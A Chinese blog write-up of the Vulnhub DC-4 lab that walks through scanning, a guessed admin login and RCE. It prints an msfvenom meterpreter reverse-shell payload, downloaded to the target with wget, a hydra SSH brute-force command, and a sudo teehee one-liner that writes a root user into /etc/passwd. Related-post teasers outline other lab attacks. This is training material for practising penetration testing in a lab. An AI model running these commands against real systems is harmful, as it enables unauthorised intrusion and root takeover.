DC-4

发表于2024-08-05|更新于2025-02-24

|总字数:747|阅读时长:2分钟|浏览量:

一、靶机安装

靶机下载地址DC: 4

下载后将解压zip包得到ova文件，然后用VMware打开ova文件

然后给靶机分配好名字和存储位置后导入

二、主机发现

使用arp-scan进行主机发现

三、端口扫描

使用nmap -p 0-65535 -T4 -sV 192.168.72.158进行端口扫描

在80端口开放了http服务，在22端口开放了ssh服务

四、访问web页面

访问web页面后。我试了试SQL万能密码。几个简单的弱口令。没有成效

由于我弱口令爆破从来没成功过。所以这个靶机我也没想去用弱口令爆破

然后又dirsearch扫了一下，什么都没有扫出来

到这里就没什么思路了。。。。。。

去看了一眼wp。。。。。

我*…..还真是让弱口令爆破。。。。。。。

admin的密码是happy

我去我常用的字典里面看了看

没有一个有happy的

登录上去直接就可以进行rce了

当我尝试反弹shell的时候。

问题来了。

试了好多命令都无法成功反弹shell

个人猜测或许与www-data用户对html文件夹只有执行的权限有关。。。。但也不确定

写文件也写不了

直接反弹shell也不行。。

突然间想到可以利用/tmp目录那shell

所有用户对/tmp目录都是可读可写可执行的

然后利用msf生成了一个木马文件msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.72.135 LPORT=7777 -f elf > asd

将其放到自己服务器上。

然后用wget http://3*.1**.7*.***/kali/asd -P /tmp将木马下载到靶机上面

然后给木马上权限

然后将shell反弹给msf

五、提权

首先就是想试一试SUID提权

觉得test.sh文件很可疑

但是运行test.sh文件只是循环输出几句话

然后权限还只是jim用户的

在jim用户的备份目录下，发现了密码清单

使用九头蛇进行ssh密码爆破 hydra -l jim -P Desktop/passwd ssh://192.168.72.158

ssh成功登录

登录时候我第一个尝试的是用sudo进行提权

但是jim没有sudo权限

然后我便没有提权思路了。。。。

《偷偷瞅一眼wp》

在我们刚刚登录上来的时候，提示我们有邮件

使用find / -name "mail"找名字里含有mail的

瞅一眼jim的邮件，发现charles把自己的密码告诉了jim

“charles你个人机”

切换到charles用户

charles可以免密使用teehee

使用teehee写一个超级用户到/etc/passwd中

1	echo "Yliken::0:0:::/bin/bash" \| sudo teehee -a /etc/passwd

六、碎碎念

靶机全部打完之后

去看了看其他人反弹shell那个地方，是如何进行反弹shell的。。。。

好家伙nc直接反弹。。。

不知道为什么我死活反弹不上去…..

不过这个靶机大多数步骤都是靠自己完成的。。挺好玩的。

文章作者: Yliken

文章链接: http://example.com/2024/08/05/%E9%9D%B6%E6%9C%BA/DC-4/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Yliken！

赞助

wechat
alipay

相关推荐

一、靶机安装靶机下载地址DC: 3.2 下载压缩包后得到DC-3.ova文件，将其用VMware打开。设置好虚拟机名称和存储路径之后，导入虚拟机导入失败点击重试即可将网络设置改为nat模式这里报错的话需要我们将磁盘设置改一下将IDE设备重0:1改为0:0 二、信息收集1.主机发现 2.端口扫描只在80端口开放了http服务三、访问web页面在登录框处试了试弱口令，sql万能密码。无成果用dirsearch进行一波目录扫描扫到了很多东西，扫出了后台登录页面/administrator/。在这个页面尝试了，弱口令、sql万能密码也没有任何成果。上面用dirsearch扫描出了很多目录，访问了之后，大多也是空白页面，没有任何回显。在网站README.txt文件中找到了cms的版本在网上搜了一下，发现这个版本存在sql注入漏洞用上面的poc来验证，确实存在SQL注入漏洞。因为没有什么过滤，为了节省时间，这里我就用sqlmap跑了。 1sqlmap -u...

一、靶机下载靶机下载地址AI Web 1.0 下载以后得到一个压缩文件解压之后，放到一个文件夹中。用VMware扫描虚拟机二、主机发现1.使用arp-scan 2.使用msf使用msf的auxiliary/scanner/discovery/arp_sweep模块三、端口扫描1.使用nmap 2.使用msf使用msf的auxiliary/scanner/portscan/tcp ...

一、靶机安装VMware打开靶机定义好虚拟机的路径，进行安装安装后网卡改为nat 然后还需要按照看完这篇教你玩转渗透测试靶机Vulnhub——DriftingBlues-2进行网卡配置二、信息收集1.主机发现其他的ip地址都是我其他虚拟机的ip除了192.168.22.132 2.端口扫描 80端口开启了web服务访问就一个图片背景的网页。没什么东西 3.目录扫描三、打靶流程根据目录扫描结果推测是用wordpress搭建的博客，博客根目录在/blog 点击网页中的链接会调转到driftingblues.box域名下配置一下本地hosts文件都是些文章，没找到什么重要信息使用wpscan来收集wordpress用户名 wpscan --url "http://driftingblues.box/blog" --enumerate u 此时也要配置一下kali中的/etc/hosts文件找到用户名albert 进行弱口令爆破wpscan --url http://driftingblues.box/blog/ -P...

一、信息收集1、主机发现使用arp-scan来寻找存活的主机 192.168.22.135是目标地址 2、端口扫描使用nmap对目标端口进行扫描nmap -p 0-65535 -sV -T4 192.168.22.135 进入web页面，发现web根目录下只是一个静态页面 3.目录扫描发现存在wordpress站点提示myname is togie 收集WordPress上面的用户名二、打靶利用收集到的用户名进行密码进行暴力破解，但是进行了很长时间也没爆破出来。靶机开启了samba服务就直接连接samba 没有得到任何信息使用enum4linux来枚举到samba服务器上面的信息开启了匿名共享 share$列出共享的内容 deets.txt文件泄露服务器密码登录上 togie可以sudo提权做法2目录扫描时候扫到了一个phpmyadmin 任何samba也泄露了wp的配置文件。里面记录着数据库用户Admin的账号和密码登录进去phpmyadmin 发现一个表也查看不了可以用show columns from...

一、靶机下载靶机下载地址DC: 1 下载后将压缩包中的ova文件解压出来，然后用VMware打开填上虚拟机名称和报错路径这边点重试即可二、主机发现1.使用arp-scan 2.使用msf进行主机发现使用auxiliary/scanner/discovery/arp_sweep 模块进行主机发现如果无法扫到主机，把虚拟机的网络配置换成nat模式三、端口扫描1.使用nmap进行端口扫描 2.使用msf进行端口扫描使用msf的auxiliary/scanner/portscan/tcp 模块进行扫描四、访问web页面80端口开放了http服务，我们访问web页面看看进入web页面，进行注册账号，发现账号注册后需要管理员审核。找回密码功能也是会对用户绑定的邮箱发送邮件在登录功能中、尝试了sql 没有发现什么问题弱口令爆破也没用什么结果（还因为爆破的次数太多导致ip被封了） web页面用的Drupal...

一、靶机安装靶机下载地址zico2: 1 下载后得到ova文件，用VMware打开导入虚拟机填一下虚拟机的名称和存储位置这里不知道为什么会失败，点击重试就行二、主机发现1.使用arp-scan进行主机发现这里其他地址都是我其他虚拟机的ip地址 2.使用msf进行主机发现前天刚看了看msf基础，想着也用着msf里面的exp模块进行一下主机发现这里使用auxiliary/scanner/discovery/arp_sweep模块进行主机发现使用set rhosts 192.168.72.1/24来设置目标网段使用set rtheads 100来设置线程数使用run来开始扫描三、端口扫描1.使用nmap进行端口扫描 2.使用msf进行端口扫描在80端口上面开启了web服务四、访问web页面网页可以互的地方挺少的点击CHECK THEM...

评论